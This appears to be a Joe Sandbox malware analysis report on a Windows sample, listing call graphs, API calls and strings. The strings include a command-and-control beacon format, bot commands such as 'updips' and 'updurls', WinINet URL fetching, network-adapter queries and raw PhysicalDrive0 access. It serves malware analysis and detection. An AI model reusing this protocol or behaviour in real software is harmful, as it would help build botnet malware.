4038e9 21613->21614 21616 4038ee 21613->21616 21615 4061f4 19 API calls 21614->21615 21615->21616 21617 40302f 12 API calls 21616->21617 21618 40391b 21617->21618 21619 402fe6 7 API calls 21618->21619 21625 40392f 21618->21625 21619->21625 21620 403972 21621 4030e1 7 API calls 21620->21621 21622 40397e 21621->21622 21622->21545 21623 40302f 12 API calls 21623->21625 21624 402fe6 7 API calls 21624->21625 21625->21620 21625->21623 21625->21624 21627 40388d 21626->21627 21629 403892 21626->21629 21628 4061f4 19 API calls 21627->21628 21628->21629 21629->21548 21631 403014 21630->21631 21632 403019 21630->21632 21634 404264 7 API calls 21631->21634 21633 40429d 7 API calls 21632->21633 21635 403022 ExitProcess 21633->21635 21634->21632 21764 40364d 21636->21764 21639 403700 21640 40370c 21639->21640 21641 403835 UnhandledExceptionFilter 21640->21641 21642 402fd8 21640->21642 21641->21642 21657 402d80 21643->21657 21646 403f2f GetEnvironmentVariableA 21650 403f4e 21646->21650 21654 40400c 21646->21654 21647 403f15 21647->21646 21648 403f27 21647->21648 21648->21560 21648->21561 21651 403f93 GetModuleFileNameA 21650->21651 21652 403f8b 21650->21652 21651->21652 21652->21654 21659 406210 21652->21659 21654->21648 21662 403ebf GetModuleHandleA 21654->21662 21656 404427 21655->21656 21656->21564 21658 402d8c GetVersionExA 21657->21658 21658->21646 21658->21647 21664 406227 21659->21664 21663 403ed6 21662->21663 21663->21648 21666 40623f 21664->21666 21668 40626f 21666->21668 21671 4053e6 21666->21671 21667 406223 21667->21654 21668->21667 21669 4053e6 6 API calls 21668->21669 21675 4073eb 21668->21675 21669->21668 21672 405404 21671->21672 21674 4053f8 21671->21674 21681 40674e 21672->21681 21674->21666 21676 4073f9 21675->21676 21677 407416 21675->21677 21676->21668 21678 407432 21677->21678 21679 4053e6 6 API calls 21677->21679 21678->21676 21693 406897 21678->21693 21679->21678 21682 406797 21681->21682 21683 40677f GetStringTypeW 21681->21683 21685 4067c2 GetStringTypeA 21682->21685 21686 4067e6 21682->21686 21683->21682 21684 40679b GetStringTypeA 21683->21684 21684->21682 21687 406883 21684->21687 21685->21687 21686->21687 21689 4067fc MultiByteToWideChar 21686->21689 21687->21674 21689->21687 21690 406820 21689->21690 21690->21687 21691 40685a MultiByteToWideChar 21690->21691 21691->21687 21692 406873 GetStringTypeW 21691->21692 21692->21687 21694 4068c7 LCMapStringW 21693->21694 21695 4068e3 21693->21695 21694->21695 21696 4068eb LCMapStringA 21694->21696 21698 406949 21695->21698 21699 40692c LCMapStringA 21695->21699 21696->21695 21697 406a25 21696->21697 21697->21676 21698->21697 21700 40695f MultiByteToWideChar 21698->21700 21699->21697 21700->21697 21701 406989 21700->21701 21701->21697 21702 4069bf MultiByteToWideChar 21701->21702 21702->21697 21703 4069d8 LCMapStringW 21702->21703 21703->21697 21704 4069f3 21703->21704 21705 4069f9 21704->21705 21707 406a39 21704->21707 21705->21697 21706 406a07 LCMapStringW 21705->21706 21706->21697 21707->21697 21708 406a71 LCMapStringW 21707->21708 21708->21697 21709 406a89 WideCharToMultiByte 21708->21709 21709->21697 21712 403041 12 API calls 21711->21712 21713 40303e 21712->21713 21713->21570 21714 402fe6 21713->21714 21715 402ff4 21714->21715 21716 402fef 21714->21716 21726 40429d 21715->21726 21720 404264 21716->21720 21721 40426e 21720->21721 21722 40429b 21721->21722 21723 40429d 7 API calls 21721->21723 21722->21715 21724 404285 21723->21724 21725 40429d 7 API calls 21724->21725 21725->21722 21729 4042b0 21726->21729 21727 402ffd 21727->21570 21728 4043c7 21732 4043da GetStdHandle WriteFile 21728->21732 21729->21727 21729->21728 21730 4042f0 21729->21730 21730->21727 21731 4042fc GetModuleFileNameA 21730->21731 21733 404314 21731->21733 21732->21727 21735 4065b8 21733->21735 21736 4065c5 LoadLibraryA 21735->21736 21738 406607 21735->21738 21737 4065d6 GetProcAddress 21736->21737 21736->21738 21737->21738 21739 4065ed GetProcAddress GetProcAddress 21737->21739 21738->21727 21739->21738 21741 4061fd 21740->21741 21742 406204 21740->21742 21744 405e30 21741->21744 21742->21606 21751 405fc9 21744->21751 21747 405fbd 21747->21742 21749 405e73 GetCPInfo 21750 405e87 21749->21750 21750->21747 21756 40606f GetCPInfo 21750->21756 21752 405fe9 21751->21752 21753 405fd9 GetOEMCP 21751->21753 21754 405e41 21752->21754 21755 405fee GetACP 21752->21755 21753->21752 21754->21747 21754->21749 21754->21750 21755->21754 21757 40615a 21756->21757 21758 406092 21756->21758 21757->21747 21759 40674e 6 API calls 21758->21759 21760 40610e 21759->21760 21761 406897 9 API calls 21760->21761 21762 406132 21761->21762 21763 406897 9 API calls 21762->21763 21763->21757 21765 403659 GetCurrentProcess TerminateProcess 21764->21765 21766 40366a 21764->21766 21765->21766 21767 402fc7 21766->21767 21768 4036d4 ExitProcess 21766->21768 21767->21639 21769 260f851 CreateFileA 21770 260f94d 21769->21770 21772 260f882 21769->21772 21771 260f89a DeviceIoControl 21771->21772 21772->21771 21773 260f943 FindCloseChangeNotification 21772->21773 21774 260f90f GetLastError 21772->21774 21775 2613afc _Allocate 60 API calls 21772->21775 21773->21770 21774->21772 21774->21773 21775->21772 20943 263f370 WriteFile 20944 26617b2 20945 2681c30 CreateFileA 20944->20945 20946 26a0860 20945->20946 20947 4022d9 Sleep 20948 4025bf 20947->20948 20948->20948 21776 40d07a 21777 40daa7 LoadLibraryExA 21776->21777 20949 263e77d 20950 263e70a 20949->20950 20951 265f7b0 FindCloseChangeNotification 20950->20951 20952 265f874 20950->20952 20951->20952 21778 265c99b 21779 26922d0 WriteFile 21778->21779

                                                                                      Executed Functions

                                                                                      Function 026072A7 Relevance: 95.2, APIs: 41, Strings: 13, Instructions: 659networksleepfileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 26072a7-26072bf InternetOpenA 1 2607385-260738b 0->1 2 26072c5-2607319 InternetSetOptionA * 3 call 2614aa0 0->2 4 26073a7-26073b5 1->4 5 260738d-2607393 1->5 10 260731e-260733c InternetOpenUrlA 2->10 8 26066f0-26066f2 4->8 9 26073bb-26073df call 2614aa0 call 260439c 4->9 6 2607395-2607397 5->6 7 2607399-26073a6 call 26053ec 5->7 6->4 7->4 13 26066f4-26066f9 8->13 14 26066fb-26066fd 8->14 9->8 31 26073e5-2607413 RtlEnterCriticalSection RtlLeaveCriticalSection call 26122ec 9->31 15 260737e-260737f InternetCloseHandle 10->15 16 260733e 10->16 21 2606704 Sleep 13->21 17 260670a-260673e RtlEnterCriticalSection RtlLeaveCriticalSection 14->17 18 26066ff 14->18 15->1 22 2607342-2607368 InternetReadFile 16->22 26 2606740-260674c 17->26 27 260678e 17->27 18->21 21->17 24 2607373-260737a InternetCloseHandle 22->24 25 260736a-2607371 22->25 24->15 25->22 26->27 30 260674e-260675b 26->30 29 2606792 27->29 29->0 32 2606763-2606764 30->32 33 260675d-2606761 30->33 39 2607415-2607427 call 26122ec 31->39 40 2607469-2607484 call 26122ec 31->40 34 2606768-260678c call 2614aa0 * 2 32->34 33->34 34->29 39->40 47 2607429-260743b call 26122ec 39->47 48 260748a-260748c 40->48 49 260773e-2607750 call 26122ec 40->49 47->40 56 260743d-260744f call 26122ec 47->56 48->49 51 2607492-2607544 call 2612f5c RtlEnterCriticalSection RtlLeaveCriticalSection call 2614aa0 * 5 call 260439c * 2 48->51 58 2607752-2607754 49->58 59 2607799-26077a2 call 26122ec 49->59 115 2607581 51->115 116 2607546-2607548 51->116 56->40 70 2607451-2607463 call 26122ec 56->70 58->59 61 2607756-2607794 call 2614aa0 RtlEnterCriticalSection RtlLeaveCriticalSection 58->61 67 26077a7-26077ab 59->67 61->8 71 26077cc-26077de call 26122ec 67->71 72 26077ad-26077bb call 26061f1 call 26062ff 67->72 70->8 70->40 81 26077e4-26077e6 71->81 82 2607afc-2607b0e call 26122ec 71->82 87 26077c0-26077c7 call 260640a 72->87 81->82 85 26077ec-2607803 call 260439c 81->85 82->8 96 2607b14-2607b42 call 2612f5c call 2614aa0 call 260439c 82->96 85->8 97 2607809-26078d7 call 26123c8 call 2601ba7 85->97 87->8 117 2607b44-2607b46 call 260534d 96->117 118 2607b4b-2607b52 call 2612f24 96->118 113 26078d9 call 260143f 97->113 114 26078de-26078ff RtlEnterCriticalSection 97->114 113->114 121 2607901-2607908 114->121 122 260790b-2607941 RtlLeaveCriticalSection call 2603c67 call 2603d7e 114->122 119 2607585-26075b3 call 2612f5c call 2614aa0 call 260439c 115->119 116->115 123 260754a-260755c call 26122ec 116->123 117->118 118->8 146 26075f4-26075fd call 2612f24 119->146 147 26075b5-26075c4 call 2613596 119->147 121->122 136 2607946-2607963 call 26082e9 122->136 123->115 134 260755e-260757f call 260439c 123->134 134->119 142 2607968-260796f 136->142 144 2607ae3-2607af7 call 2608fb1 142->144 145 2607975-26079af call 260a6d3 142->145 144->8 152 26079b4-26079bd 145->152 159 2607603-260761b call 2613afc 146->159 160 2607734-2607737 146->160 147->146 156 26075c6 147->156 157 26079c3-26079ca 152->157 158 2607aad-2607ade call 2608398 call 26033b2 152->158 161 26075cb-26075dd call 2612800 156->161 163 26079cd-26079d2 157->163 158->144 172 2607627 159->172 173 260761d-2607625 call 26096e5 159->173 160->49 175 26075e2-26075f2 call 2613596 161->175 176 26075df 161->176 163->163 167 26079d4-2607a11 call 260a6d3 163->167 177 2607a16-2607a1f 167->177 174 2607629-260765d call 260a7fd call 2603863 172->174 173->174 188 2607662-260767e call 2605119 174->188 175->146 175->161 176->175 177->158 182 2607a25-2607a2b 177->182 185 2607a2e-2607a33 182->185 185->185 187 2607a35-2607a70 call 260a6d3 185->187 187->158 192 2607a72-2607aa6 call 260d0c5 187->192 193 2607683-26076b4 call 2603863 call 260aaa3 188->193 196 2607aab-2607aac 192->196 199 26076b9-26076cb call 260abbd 193->199 196->158 201 26076d0-26076e1 199->201 202 26076e3 call 260380b 201->202 203 26076e8-26076f7 Sleep 201->203 202->203 205 26076ff-2607713 call 26118a0 203->205 207 2607715-260771e call 2604100 205->207 208 260771f-260772d 205->208 207->208 208->160 210 260772f call 260380b 208->210 210->160
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(0000EA60), ref: 02606704
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 0260670F
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 02606720
                                                                                      • _memset.LIBCMT ref: 02606775
                                                                                      • _memset.LIBCMT ref: 02606784
                                                                                      • InternetOpenA.WININET(?), ref: 026072B1
                                                                                      • InternetSetOptionA.WININET(00000000,00000002,?), ref: 026072D9
                                                                                      • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 026072F1
                                                                                      • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02607309
                                                                                      • _memset.LIBCMT ref: 02607319
                                                                                      • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02607332
                                                                                      • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02607354
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 02607374
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0260737F
                                                                                      • _memset.LIBCMT ref: 026073C7
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 026073EA
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 026073FB
                                                                                      • _malloc.LIBCMT ref: 02607494
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 026074A6
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 026074B2
                                                                                      • _memset.LIBCMT ref: 026074CC
                                                                                      • _memset.LIBCMT ref: 026074DB
                                                                                      • _memset.LIBCMT ref: 026074EB
                                                                                      • _memset.LIBCMT ref: 026074FE
                                                                                      • _memset.LIBCMT ref: 02607514
                                                                                      • _malloc.LIBCMT ref: 0260758A
                                                                                      • _memset.LIBCMT ref: 0260759B
                                                                                      • _strtok.LIBCMT ref: 026075BB
                                                                                      • _swscanf.LIBCMT ref: 026075D2
                                                                                      • _strtok.LIBCMT ref: 026075E9
                                                                                      • _free.LIBCMT ref: 026075F5
                                                                                      • Sleep.KERNEL32(000007D0), ref: 026076ED
                                                                                      • _memset.LIBCMT ref: 02607761
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 0260776E
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 02607780
                                                                                      • _sprintf.LIBCMT ref: 0260781E
                                                                                      • RtlEnterCriticalSection.NTDLL(00000020), ref: 026078E2
                                                                                      • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02607916
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                                      • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                                      • API String ID: 696907137-1839899575
                                                                                      • Opcode ID: 262c02870666d54ac191bbce90b7da178b3802a36d03c2f62581e797092f6ee3
                                                                                      • Instruction ID: 7f31793c3411e325bee8d9ec0bd698fe17b8ffd0c299e82dbfd48472c2b84461
                                                                                      • Opcode Fuzzy Hash: 262c02870666d54ac191bbce90b7da178b3802a36d03c2f62581e797092f6ee3
                                                                                      • Instruction Fuzzy Hash: 1632E0715483819FE73AAF64DC84BAFBBE6AF85310F14081DF589972D0DB70A408DB5A
                                                                                      Function 02606487 Relevance: 82.5, APIs: 42, Strings: 5, Instructions: 228memorysleeplibraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 473 2606487-26064e8 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 474 26064ef-26066ed GetTickCount call 260605a GetVersionExA call 2614aa0 call 2612f5c * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2614aa0 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2612f5c * 4 QueryPerformanceCounter Sleep call 2612f5c * 2 call 2614aa0 * 2 473->474 475 26064ea call 26042c7 473->475 518 26066f0-26066f2 474->518 475->474 519 26066f4-26066f9 518->519 520 26066fb-26066fd 518->520 523 2606704 Sleep 519->523 521 260670a-260673e RtlEnterCriticalSection RtlLeaveCriticalSection 520->521 522 26066ff 520->522 524 2606740-260674c 521->524 525 260678e 521->525 522->523 523->521 524->525 527 260674e-260675b 524->527 526 2606792-26072bf InternetOpenA 525->526 532 2607385-260738b 526->532 533 26072c5-260733c InternetSetOptionA * 3 call 2614aa0 InternetOpenUrlA 526->533 529 2606763-2606764 527->529 530 260675d-2606761 527->530 531 2606768-260678c call 2614aa0 * 2 529->531 530->531 531->526 536 26073a7-26073b5 532->536 537 260738d-2607393 532->537 546 260737e-260737f InternetCloseHandle 533->546 547 260733e 533->547 536->518 541 26073bb-26073df call 2614aa0 call 260439c 536->541 538 2607395-2607397 537->538 539 2607399-26073a6 call 26053ec 537->539 538->536 539->536 541->518 556 26073e5-2607413 RtlEnterCriticalSection RtlLeaveCriticalSection call 26122ec 541->556 546->532 551 2607342-2607368 InternetReadFile 547->551 553 2607373-260737a InternetCloseHandle 551->553 554 260736a-2607371 551->554 553->546 554->551 559 2607415-2607427 call 26122ec 556->559 560 2607469-2607484 call 26122ec 556->560 559->560 565 2607429-260743b call 26122ec 559->565 566 260748a-260748c 560->566 567 260773e-2607750 call 26122ec 560->567 565->560 574 260743d-260744f call 26122ec 565->574 566->567 569 2607492-2607544 call 2612f5c RtlEnterCriticalSection RtlLeaveCriticalSection call 2614aa0 * 5 call 260439c * 2 566->569 576 2607752-2607754 567->576 577 2607799-26077ab call 26122ec 567->577 633 2607581 569->633 634 2607546-2607548 569->634 574->560 588 2607451-2607463 call 26122ec 574->588 576->577 579 2607756-2607794 call 2614aa0 RtlEnterCriticalSection RtlLeaveCriticalSection 576->579 589 26077cc-26077de call 26122ec 577->589 590 26077ad-26077bb call 26061f1 call 26062ff 577->590 579->518 588->518 588->560 599 26077e4-26077e6 589->599 600 2607afc-2607b0e call 26122ec 589->600 605 26077c0-26077c7 call 260640a 590->605 599->600 603 26077ec-2607803 call 260439c 599->603 600->518 614 2607b14-2607b42 call 2612f5c call 2614aa0 call 260439c 600->614 603->518 615 2607809-26078d7 call 26123c8 call 2601ba7 603->615 605->518 635 2607b44-2607b46 call 260534d 614->635 636 2607b4b-2607b52 call 2612f24 614->636 631 26078d9 call 260143f 615->631 632 26078de-26078ff RtlEnterCriticalSection 615->632 631->632 639 2607901-2607908 632->639 640 260790b-260796f RtlLeaveCriticalSection call 2603c67 call 2603d7e call 26082e9 632->640 637 2607585-26075b3 call 2612f5c call 2614aa0 call 260439c 633->637 634->633 641 260754a-260755c call 26122ec 634->641 635->636 636->518 664 26075f4-26075fd call 2612f24 637->664 665 26075b5-26075c4 call 2613596 637->665 639->640 662 2607ae3-2607af7 call 2608fb1 640->662 663 2607975-26079bd call 260a6d3 640->663 641->633 652 260755e-260757f call 260439c 641->652 652->637 662->518 675 26079c3-26079ca 663->675 676 2607aad-2607ade call 2608398 call 26033b2 663->676 677 2607603-260761b call 2613afc 664->677 678 2607734-2607737 664->678 665->664 674 26075c6 665->674 679 26075cb-26075dd call 2612800 674->679 681 26079cd-26079d2 675->681 676->662 690 2607627 677->690 691 260761d-2607625 call 26096e5 677->691 678->567 693 26075e2-26075f2 call 2613596 679->693 694 26075df 679->694 681->681 685 26079d4-2607a1f call 260a6d3 681->685 685->676 700 2607a25-2607a2b 685->700 692 2607629-26076cb call 260a7fd call 2603863 call 2605119 call 2603863 call 260aaa3 call 260abbd 690->692 691->692 719 26076d0-26076e1 692->719 693->664 693->679 694->693 703 2607a2e-2607a33 700->703 703->703 705 2607a35-2607a70 call 260a6d3 703->705 705->676 710 2607a72-2607aa6 call 260d0c5 705->710 714 2607aab-2607aac 710->714 714->676 720 26076e3 call 260380b 719->720 721 26076e8-2607713 Sleep call 26118a0 719->721 720->721 725 2607715-260771e call 2604100 721->725 726 260771f-260772d 721->726 725->726 726->678 728 260772f call 260380b 726->728 728->678
                                                                                      APIs
                                                                                      • RtlInitializeCriticalSection.NTDLL(026371D8), ref: 026064B6
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 026064CD
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 026064D6
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 026064E5
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 026064E8
                                                                                      • GetTickCount.KERNEL32 ref: 026064F4
                                                                                        • Part of subcall function 0260605A: _malloc.LIBCMT ref: 02606068
                                                                                      • GetVersionExA.KERNEL32(02637030), ref: 02606521
                                                                                      • _memset.LIBCMT ref: 02606540
                                                                                      • _malloc.LIBCMT ref: 0260654D
                                                                                        • Part of subcall function 02612F5C: __FF_MSGBANNER.LIBCMT ref: 02612F73
                                                                                        • Part of subcall function 02612F5C: __NMSG_WRITE.LIBCMT ref: 02612F7A
                                                                                        • Part of subcall function 02612F5C: RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 02612F9F
                                                                                      • _malloc.LIBCMT ref: 0260655D
                                                                                      • _malloc.LIBCMT ref: 02606568
                                                                                      • _malloc.LIBCMT ref: 02606573
                                                                                      • _malloc.LIBCMT ref: 0260657E
                                                                                      • _malloc.LIBCMT ref: 02606589
                                                                                      • _malloc.LIBCMT ref: 02606594
                                                                                      • _malloc.LIBCMT ref: 026065A3
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000004), ref: 026065BA
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 026065C3
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 026065D2
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 026065D5
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 026065E0
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 026065E3
                                                                                      • _memset.LIBCMT ref: 026065F6
                                                                                      • _memset.LIBCMT ref: 02606602
                                                                                      • _memset.LIBCMT ref: 0260660F
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 0260661D
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 0260662A
                                                                                      • _malloc.LIBCMT ref: 0260664E
                                                                                      • _malloc.LIBCMT ref: 0260665C
                                                                                      • _malloc.LIBCMT ref: 02606663
                                                                                      • _malloc.LIBCMT ref: 02606689
                                                                                      • QueryPerformanceCounter.KERNEL32(00000200), ref: 0260669C
                                                                                      • Sleep.KERNELBASE ref: 026066AA
                                                                                      • _malloc.LIBCMT ref: 026066B6
                                                                                      • _malloc.LIBCMT ref: 026066C3
                                                                                      • _memset.LIBCMT ref: 026066D8
                                                                                      • _memset.LIBCMT ref: 026066E8
                                                                                      • Sleep.KERNELBASE(0000EA60), ref: 02606704
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 0260670F
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 02606720
                                                                                      • _memset.LIBCMT ref: 02606775
                                                                                      • _memset.LIBCMT ref: 02606784
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                      • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                      • API String ID: 2251652938-2678694477
                                                                                      • Opcode ID: e19cab9bd5923c276dcf071d0aabfc98243b41e192cc2a2a7e666422092eefdf
                                                                                      • Instruction ID: 652079d114c61dca50e16751eabd89fd554770d84aec6dbb73c38f876a5bba69
                                                                                      • Opcode Fuzzy Hash: e19cab9bd5923c276dcf071d0aabfc98243b41e192cc2a2a7e666422092eefdf
                                                                                      • Instruction Fuzzy Hash: 3E71C1B1D88350AFE3216F349C49B1FBBE8AF45310F15481DF98997290DBB46849CF9A
                                                                                      Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 832 401b4b-401b68 LoadLibraryA 833 401c21-401c25 832->833 834 401b6e-401b7f GetProcAddress 832->834 835 401b85-401b8e 834->835 836 401c18-401c1b FreeLibrary 834->836 837 401b95-401ba5 GetAdaptersInfo 835->837 836->833 838 401ba7-401bb0 837->838 839 401bdb-401be3 837->839 840 401bc1-401bd7 call 402d00 call 4018cc 838->840 841 401bb2-401bb6 838->841 842 401be5-401beb call 402ce6 839->842 843 401bec-401bf0 839->843 840->839 841->839 846 401bb8-401bbf 841->846 842->843 844 401bf2-401bf6 843->844 845 401c15-401c17 843->845 844->845 849 401bf8-401bfb 844->849 845->836 846->840 846->841 852 401c06-401c13 call 402cd8 849->852 853 401bfd-401c03 849->853 852->837 852->845 853->852
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                      • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                      • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                      • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                      • API String ID: 514930453-3667123677
                                                                                      • Opcode ID: a3c77d1947fac9ed500e02c632cb5410261389502922d6f95d8c76429a6c9e05
                                                                                      • Instruction ID: 2fcbbae68a7f2e143e0ba6fa3878dab2488d9b05c73812711a2b91e8578584ab
                                                                                      • Opcode Fuzzy Hash: a3c77d1947fac9ed500e02c632cb5410261389502922d6f95d8c76429a6c9e05
                                                                                      • Instruction Fuzzy Hash: E521A770904109AEEF119B65CD447EF7BB8EF41344F1440BAD504B22E1E7789985CB69
                                                                                      Function 0260F955 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 906 260f955-260f978 LoadLibraryA 907 260fa38-260fa3f 906->907 908 260f97e-260f98c GetProcAddress 906->908 909 260fa31-260fa32 FreeLibrary 908->909 910 260f992-260f9a2 908->910 909->907 911 260f9a4-260f9b0 GetAdaptersInfo 910->911 912 260f9b2 911->912 913 260f9e8-260f9f0 911->913 916 260f9b4-260f9bb 912->916 914 260f9f2-260f9f8 call 2613758 913->914 915 260f9f9-260f9fe 913->915 914->915 918 260fa00-260fa03 915->918 919 260fa2c-260fa30 915->919 920 260f9c5-260f9cd 916->920 921 260f9bd-260f9c1 916->921 918->919 923 260fa05-260fa0a 918->923 919->909 925 260f9d0-260f9d5 920->925 921->916 924 260f9c3 921->924 926 260fa17-260fa22 call 2613afc 923->926 927 260fa0c-260fa14 923->927 924->913 925->925 928 260f9d7-260f9e4 call 260f6a4 925->928 926->919 933 260fa24-260fa27 926->933 927->926 928->913 933->911
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 0260F96B
                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 0260F984
                                                                                      • GetAdaptersInfo.IPHLPAPI(?,?), ref: 0260F9A9
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0260FA32
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                      • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                      • API String ID: 514930453-3114217049
                                                                                      • Opcode ID: d51c55967de2a6bfe1431d036b7386641341cf89dc8b99104b1b6d6762f50e73
                                                                                      • Instruction ID: d15d6107f63c4fb730845c2c6f89d1ec04e66c86d0b96fc8dcbb335f7ff44327
                                                                                      • Opcode Fuzzy Hash: d51c55967de2a6bfe1431d036b7386641341cf89dc8b99104b1b6d6762f50e73
                                                                                      • Instruction Fuzzy Hash: 0221B471E00209ABDB29CBA9D8C4AEFBBF8AF05310F1440A9E405E7791DF309945DBA4
                                                                                      Function 0260F851 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 991 260f851-260f87c CreateFileA 992 260f882-260f897 991->992 993 260f94d-260f954 991->993 994 260f89a-260f8bc DeviceIoControl 992->994 995 260f8f5-260f8fd 994->995 996 260f8be-260f8c6 994->996 997 260f906-260f908 995->997 998 260f8ff-260f905 call 2613758 995->998 999 260f8c8-260f8cd 996->999 1000 260f8cf-260f8d4 996->1000 1003 260f943-260f94c FindCloseChangeNotification 997->1003 1004 260f90a-260f90d 997->1004 998->997 999->995 1000->995 1001 260f8d6-260f8de 1000->1001 1005 260f8e1-260f8e6 1001->1005 1003->993 1007 260f929-260f936 call 2613afc 1004->1007 1008 260f90f-260f918 GetLastError 1004->1008 1005->1005 1009 260f8e8-260f8f4 call 260f6a4 1005->1009 1007->1003 1015 260f938-260f93e 1007->1015 1008->1003 1010 260f91a-260f91d 1008->1010 1009->995 1010->1007 1014 260f91f-260f926 1010->1014 1014->1007 1015->994
                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 0260F870
                                                                                      • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 0260F8AE
                                                                                      • GetLastError.KERNEL32 ref: 0260F90F
                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0260F946
                                                                                      Strings
                                                                                      Memory Dump Source
